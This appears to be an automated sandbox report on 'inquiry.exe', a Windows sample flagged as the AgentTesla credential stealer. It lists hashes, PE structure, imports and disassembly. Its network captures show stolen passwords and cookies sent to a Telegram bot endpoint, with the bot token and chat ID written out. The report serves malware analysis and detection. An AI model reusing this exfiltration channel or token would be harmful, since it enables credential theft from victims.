SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
MD5:	EA7F9615D77815B5FFF7C15179C6C560
SHA1:	3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
SHA-256:	A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
SHA-512:	9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.084849960366302
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	inquiry.exe
File size:	372736
MD5:	e15248f30c0657187fbb03e46430f97a
SHA1:	42b284897791f02b6b076acf13f406ffd5a4b19a
SHA256:	9f2dc372685655a102ba02d121745b124d47ea7b90d0f697181fda747a26ae2e
SHA512:	df22be2f037e745e0ecc42ace32c98447444d9f9c4f0bc95da86e901a515fa991db21f718a75b3951f9d6d0f32d5c8c71f74fa8f9bd83baf5571c5cc90b3905f
SSDEEP:	6144:t6Ln5Pq0DQf98AZiCdeTl8Wt/0urlIm8y1sOlAYjCMHGeKGDuGyGN:t6Ln5Pq0DQ5uuWtH5Im8sjC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ivc.-...-...-... E..5... E.."... E..H...9\|..>...-...X....I..,....I..,....I..,...Rich-...........................PE..L...$2Aa...

File Icon


Icon Hash:	5a18da1af8cc862a

Static PE Info

General
Entrypoint:	0x402a17
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61413224 [Tue Sep 14 23:37:08 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	c2e2fa89aec204ac5f3945ce98025d14

Entrypoint Preview

Instruction
call 00007F0960D06026h
jmp 00007F0960D04EA0h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
cmp dword ptr [eax], E06D7363h
jne 00007F0960D05047h
cmp dword ptr [eax+10h], 03h
jne 00007F0960D05041h
mov eax, dword ptr [eax+14h]
cmp eax, 19930520h
je 00007F0960D0503Dh
cmp eax, 19930521h
je 00007F0960D05036h
cmp eax, 19930522h
je 00007F0960D0502Fh
cmp eax, 01994000h
je 00007F0960D05028h
xor eax, eax
pop ebp
retn 0004h
call 00007F0960D06318h
int3
push 00402A21h
call 00007F0960D066CAh
pop ecx
xor eax, eax
ret
push ebp
mov ebp, esp
push esi
call 00007F0960D052C4h
mov esi, eax
test esi, esi
je 00007F0960D0516Bh
mov edx, dword ptr [esi+5Ch]
mov ecx, edx
push edi
mov edi, dword ptr [ebp+08h]
cmp dword ptr [ecx], edi
je 00007F0960D0502Fh
add ecx, 0Ch
lea eax, dword ptr [edx+00000090h]
cmp ecx, eax
jc 00007F0960D05011h
lea eax, dword ptr [edx+00000090h]
cmp ecx, eax
jnc 00007F0960D05026h
cmp dword ptr [ecx], edi
je 00007F0960D05024h
xor ecx, ecx
test ecx, ecx
je 00007F0960D05136h
mov edx, dword ptr [ecx+08h]
test edx, edx
je 00007F0960D0512Bh
cmp edx, 05h
jne 00007F0960D0502Eh
and dword ptr [ecx+08h], 00000000h
xor eax, eax
inc eax
jmp 00007F0960D0511Bh
cmp edx, 01h
jne 00007F0960D0502Ah
or eax, FFFFFFFFh
jmp 00007F0960D0510Eh

Rich Headers

Programming Language:

[ C ] VS2015 UPD3.1 build 24215
[C++] VS2013 build 21005
[LNK] VS2015 UPD3.1 build 24215
[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[RES] VS2015 UPD3 build 24213

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x113bc	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16000	0x48240	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5f000	0xd74	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x10e30	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x10e50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xd000	0x1c0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb6d6	0xb800	False	0.581861413043	data	6.64629597129	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xd000	0x4dd4	0x4e00	False	0.389372996795	data	4.66939133534	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x12000	0x31c4	0x1400	False	0.319921875	data	3.49601973843	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x16000	0x48240	0x48400	False	0.730830314663	data	7.18862845135	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5f000	0xd74	0xe00	False	0.80078125	data	6.45894600022	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
OZX	0x160f0	0x3790a	data	English	United States
RT_ICON	0x4da00	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0	English	United States
RT_GROUP_ICON	0x5e228	0x14	data	English	United States

Imports

DLL	Import
KERNEL32.dll	FreeLibrary, GetProcAddress, LoadLibraryExW, lstrcmpiW, lstrcpyW, lstrcatW, lstrlenW, CloseHandle, WriteConsoleW, SetFilePointerEx, SetStdHandle, GetConsoleMode, GetConsoleCP, FlushFileBuffers, LCMapStringW, VirtualProtect, GetStringTypeW, HeapReAlloc, OutputDebugStringW, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, LeaveCriticalSection, EnterCriticalSection, GetModuleHandleW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, TerminateProcess, GetCurrentProcess, GetProcessHeap, HeapFree, HeapAlloc, GetLastError, HeapSize, ExpandEnvironmentStringsW, GetCommandLineW, SetLastError, GetCurrentThreadId, EncodePointer, DecodePointer, ExitProcess, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameW, WriteFile, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, CreateFileW
MSWSOCK.dll	getnetbyname, SetServiceA, GetAddressByNameA, EnumProtocolsA, rcmd, AcceptEx
rtutils.dll	TraceGetConsoleW, TraceVprintfExW, RouterLogEventStringA, RouterLogEventW, TraceDeregisterW, LogEventA
MAPI32.dll
WININET.dll	GopherFindFirstFileW, InternetQueryOptionA, InternetHangUp, FindFirstUrlCacheContainerW
RPCRT4.dll	NDRSContextMarshall, NdrSimpleStructFree, RpcServerInqBindings, NdrConvert2, NdrNonEncapsulatedUnionBufferSize, NdrConformantArrayUnmarshall
SHELL32.dll	ExtractAssociatedIconExA, SHBrowseForFolder
USER32.dll	MessageBoxW, GetDC, GrayStringA
ADVAPI32.dll	RegQueryValueExW, RegQueryValueExA, RegOpenKeyExW, RegCloseKey, StartServiceCtrlDispatcherW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2021 16:15:45.103359938 CEST	49815	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:45.103410959 CEST	443	49815	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:45.103543997 CEST	49815	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:45.209914923 CEST	49815	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:45.209954023 CEST	443	49815	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:45.274728060 CEST	443	49815	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:45.274981976 CEST	49815	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:45.279645920 CEST	49815	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:45.279670000 CEST	443	49815	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:45.280087948 CEST	443	49815	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:45.326920033 CEST	49815	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:46.835547924 CEST	49815	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:46.863400936 CEST	443	49815	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:46.865629911 CEST	49815	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:46.907140970 CEST	443	49815	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:47.031013012 CEST	443	49815	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:47.032561064 CEST	49815	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:47.032588005 CEST	443	49815	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:47.032655001 CEST	443	49815	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:47.032655954 CEST	49815	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:47.032701969 CEST	49815	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:48.175383091 CEST	49816	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:48.175430059 CEST	443	49816	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:48.175590992 CEST	49816	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:48.176250935 CEST	49816	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:48.176260948 CEST	443	49816	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:48.233170033 CEST	443	49816	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:48.237601042 CEST	49816	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:48.237663031 CEST	443	49816	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:48.291100025 CEST	443	49816	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:48.292366028 CEST	49816	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:48.292439938 CEST	443	49816	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:48.545851946 CEST	443	49816	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:48.547219992 CEST	49816	443	192.168.2.6	149.154.167.220
Sep 15, 2021 16:15:48.547245026 CEST	443	49816	149.154.167.220	192.168.2.6
Sep 15, 2021 16:15:48.547663927 CEST	49816	443	192.168.2.6	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2021 16:13:46.895108938 CEST	49283	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:13:46.924200058 CEST	53	49283	8.8.8.8	192.168.2.6
Sep 15, 2021 16:14:18.379139900 CEST	58377	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:14:18.415112972 CEST	53	58377	8.8.8.8	192.168.2.6
Sep 15, 2021 16:14:35.998142004 CEST	55074	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:14:36.070501089 CEST	53	55074	8.8.8.8	192.168.2.6
Sep 15, 2021 16:14:36.555069923 CEST	54513	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:14:36.586505890 CEST	53	54513	8.8.8.8	192.168.2.6
Sep 15, 2021 16:14:37.095172882 CEST	62044	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:14:37.156869888 CEST	53	62044	8.8.8.8	192.168.2.6
Sep 15, 2021 16:14:37.467835903 CEST	63791	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:14:37.489142895 CEST	64267	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:14:37.502453089 CEST	53	63791	8.8.8.8	192.168.2.6
Sep 15, 2021 16:14:37.514149904 CEST	53	64267	8.8.8.8	192.168.2.6
Sep 15, 2021 16:14:38.016648054 CEST	49448	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:14:38.058224916 CEST	53	49448	8.8.8.8	192.168.2.6
Sep 15, 2021 16:14:38.507692099 CEST	60342	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:14:38.535490990 CEST	53	60342	8.8.8.8	192.168.2.6
Sep 15, 2021 16:14:39.094995975 CEST	61346	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:14:39.129574060 CEST	53	61346	8.8.8.8	192.168.2.6
Sep 15, 2021 16:14:39.169414997 CEST	51774	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:14:39.194205046 CEST	53	51774	8.8.8.8	192.168.2.6
Sep 15, 2021 16:14:40.029978037 CEST	56023	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:14:40.059937954 CEST	53	56023	8.8.8.8	192.168.2.6
Sep 15, 2021 16:14:40.854108095 CEST	58384	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:14:40.881985903 CEST	53	58384	8.8.8.8	192.168.2.6
Sep 15, 2021 16:14:41.369311094 CEST	60261	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:14:41.396296978 CEST	53	60261	8.8.8.8	192.168.2.6
Sep 15, 2021 16:14:55.202116966 CEST	56061	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:14:55.208825111 CEST	58336	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:14:55.245275974 CEST	53	56061	8.8.8.8	192.168.2.6
Sep 15, 2021 16:14:55.246695995 CEST	53	58336	8.8.8.8	192.168.2.6
Sep 15, 2021 16:15:00.079891920 CEST	53781	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:15:00.117870092 CEST	53	53781	8.8.8.8	192.168.2.6
Sep 15, 2021 16:15:14.386492968 CEST	54064	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:15:14.422173977 CEST	53	54064	8.8.8.8	192.168.2.6
Sep 15, 2021 16:15:36.179539919 CEST	52811	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:15:36.216857910 CEST	53	52811	8.8.8.8	192.168.2.6
Sep 15, 2021 16:15:37.877985954 CEST	55299	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:15:37.919578075 CEST	53	55299	8.8.8.8	192.168.2.6
Sep 15, 2021 16:15:44.943932056 CEST	63745	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:15:44.969933033 CEST	53	63745	8.8.8.8	192.168.2.6
Sep 15, 2021 16:15:48.143063068 CEST	50055	53	192.168.2.6	8.8.8.8
Sep 15, 2021 16:15:48.173480034 CEST	53	50055	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 15, 2021 16:15:44.943932056 CEST	192.168.2.6	8.8.8.8	0x2f50	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
Sep 15, 2021 16:15:48.143063068 CEST	192.168.2.6	8.8.8.8	0xdd5d	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 15, 2021 16:15:44.969933033 CEST	8.8.8.8	192.168.2.6	0x2f50	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)
Sep 15, 2021 16:15:48.173480034 CEST	8.8.8.8	192.168.2.6	0xdd5d	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49815	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-15 14:15:46 UTC	0	OUT	POST /bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8d9787feba99997 Host: api.telegram.org Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
2021-09-15 14:15:46 UTC	0	IN	HTTP/1.1 100 Continue
2021-09-15 14:15:46 UTC	0	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 37 38 37 66 65 62 61 39 39 39 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 37 31 37 31 32 31 37 31 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 37 38 37 66 65 62 61 39 39 39 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 2f 31 32 34 34 30 36 0a 4f 53 46 Data Ascii: -----------------------------8d9787feba99997Content-Disposition: form-data; name="chat_id"1717121719-----------------------------8d9787feba99997Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/124406OSF
2021-09-15 14:15:47 UTC	1	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 15 Sep 2021 14:15:47 GMT Content-Type: application/json Content-Length: 600 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":1791,"from":{"id":1803146213,"is_bot":true,"first_name":"chima22bot","username":"chima22bot"},"chat":{"id":1717121719,"first_name":"Puzh6ix","type":"private"},"date":1631715346,"document":{"file_name":"user-124406 2021-09-15 07-34-38.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIG_2FCAAESNyeegdZR9DO2ceehGzLGHwACOAoAAiecEVL0TMUMUI5GAyAE","file_unique_id":"AgADOAoAAiecEVI","file_size":436},"caption":"New PW Recovered!\n\nUser Name: user/124406\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49816	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-15 14:15:48 UTC	2	OUT	POST /bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8d9788283298e0e Host: api.telegram.org Content-Length: 1900 Expect: 100-continue
2021-09-15 14:15:48 UTC	2	IN	HTTP/1.1 100 Continue
2021-09-15 14:15:48 UTC	2	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 37 38 38 32 38 33 32 39 38 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 37 31 37 31 32 31 37 31 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 37 38 38 32 38 33 32 39 38 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 2f 31 32 34 34 30 36 Data Ascii: -----------------------------8d9788283298e0eContent-Disposition: form-data; name="chat_id"1717121719-----------------------------8d9788283298e0eContent-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/124406
2021-09-15 14:15:48 UTC	3	OUT	Data Raw: 6a a0 f3 72 71 24 12 b3 9d 31 b4 dd dd ec b2 ef 68 8d c7 6c b3 64 e9 4c b5 f5 11 96 5f a1 66 47 6c 50 e9 db 39 28 d3 e8 a5 09 8b 51 77 8e 62 d4 9d 82 96 96 56 af 2f 94 0c 0b c4 28 ec 63 fb ed fb 73 4e b3 aa 56 e2 e6 42 5a ad 2e 05 35 5e 7d a8 1b 16 ea 43 c1 a0 30 de be b0 8a f2 8c 6b 6e f4 fc 61 fd b8 39 51 77 65 a4 06 94 de bb 93 e9 ae ed c9 9a 8e 55 bb 73 67 ba af 3f 99 de 4d ef 90 77 c7 e8 c5 61 a8 a9 de 12 f1 f8 42 89 e0 72 dd 72 5b 50 e3 ee d5 dd db 37 b8 eb 3b e0 44 51 3a 46 a4 1f a5 af 9c 1b 00 00 00 00 00 00 00 fc 2b 5d 2f 8a 89 c6 85 f3 1a dd cc 17 35 6e ec cd 31 b5 ec 1e ba 98 85 f8 8d d7 78 c4 70 e3 e5 d4 5a 41 6c 6e cc e7 b5 a2 6a 73 8d 97 ec d6 f8 2a e2 ee ff a7 88 34 25 fd 22 9d f9 a7 ff 0b 00 00 00 00 00 00 00 ac 28 2c 26 84 65 4e 01 c4 d5 Data Ascii: jrq$1hldL_fGlP9(QwbV/(csNVBZ.5^}C0kna9QweUsg?MwaBrr[P7;DQ:F+]/5n1xpZAlnjs*4%"(,&eN
2021-09-15 14:15:48 UTC	4	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 15 Sep 2021 14:15:48 GMT Content-Type: application/json Content-Length: 612 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":1792,"from":{"id":1803146213,"is_bot":true,"first_name":"chima22bot","username":"chima22bot"},"chat":{"id":1717121719,"first_name":"Puzh6ix","type":"private"},"date":1631715348,"document":{"file_name":"user-124406 2021-09-15 07-52-53.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIHAAFhQgABFLO-vknL1-cNM0y8hS04hdcAAjkKAAInnBFSvsTLbAqpgg4gBA","file_unique_id":"AgADOQoAAiecEVI","file_size":1315},"caption":"New Cookie Recovered!\n\nUser Name: user/124406\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: inquiry.exe PID: 4388 Parent PID: 1808

General

Start time:	16:13:51
Start date:	15/09/2021
Path:	C:\Users\user\Desktop\inquiry.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\inquiry.exe'
Imagebase:	0xd40000
File size:	372736 bytes
MD5 hash:	E15248F30C0657187FBB03E46430F97A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 2576 Parent PID: 4388

General

Start time:	16:13:52
Start date:	15/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: MSBuild.exe PID: 6336 Parent PID: 4388

General

Start time:	16:13:52
Start date:	15/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\inquiry.exe'
Imagebase:	0xbf0000
File size:	261728 bytes
MD5 hash:	D621FD77BD585874F9686D3A76462EF1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: inquiry.exe PID: 4388 Parent PID: 1808 inquiry.exeCOMMON

Executed Functions

Function 00A906DA, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A907B4
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00A907DE
ReadFile.KERNELBASE(00000000,00000000,00A9026C,?,00000000), ref: 00A907F5
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00A90817
FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,00A901AE,7FDFFF66), ref: 00A9088A
VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 00A90895
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,00A901AE), ref: 00A908E0

Memory Dump Source

Source File: 00000000.00000002.352955029.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
Instruction ID: 78c6a04c1294304174033e8f96531058134aaeff4cd64a869add7636435607ed
Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
Instruction Fuzzy Hash: DF617C35F00718AFCF10DBA8C884FAEB7B5AF48790F248459E915EB391EB749D418B94

Uniqueness

Uniqueness Score: -1.00%

